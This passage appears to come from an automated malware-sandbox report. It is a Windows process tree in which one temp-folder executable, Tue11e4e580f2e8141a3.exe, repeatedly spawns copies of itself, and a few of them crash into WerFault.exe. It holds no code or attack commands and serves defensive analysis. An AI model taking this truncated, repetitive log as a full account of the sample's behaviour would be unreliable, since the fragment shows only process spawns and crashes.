        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10052
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9256
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9424
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10224
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8860
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9716
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1696
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10076
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10176
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4532
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9872
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4360
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9824
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7412
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2808
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9536
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9088
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8884
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9236
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9456
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9104
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8420
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5108
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9304
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8096
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9936
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9596
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9552
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9184
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9796
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7360
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9856
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10036
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8660
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9908
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8300
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9776
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9820
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9380
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 9380 -s 28
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:2396
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9376
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4240
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9796
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9752
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 9752 -s 28
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:5248
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9544
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6852
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3212
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9548
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10108
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2580
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9328
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 9328 -s 28
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:9752
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9860
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10128
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9364
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6352
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8700
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3052
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9920
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10172
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9444
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1096
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1544
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5748
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8208
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9680
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9416
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9560
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8528
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9640
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6192
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1344
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7544
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10320
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10436
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10524
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10616
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10700
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10796
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10880
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10908
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:11004
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:11076
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:11160
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:11180
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6684
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4832
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9516
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10588
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10724
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10816
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1436
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:11024
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9636
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:11220
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10376
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9532
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10476
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10572
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3052
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10836
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10960
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4752
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4752 -s 28
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:7172
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1796
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7340
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10708
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8560
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10144
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10216
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:11096
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9292
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3088
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8272
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9212
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10664
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8460
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10308
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9092
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9944
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:11188
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3444
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7244
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9696
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
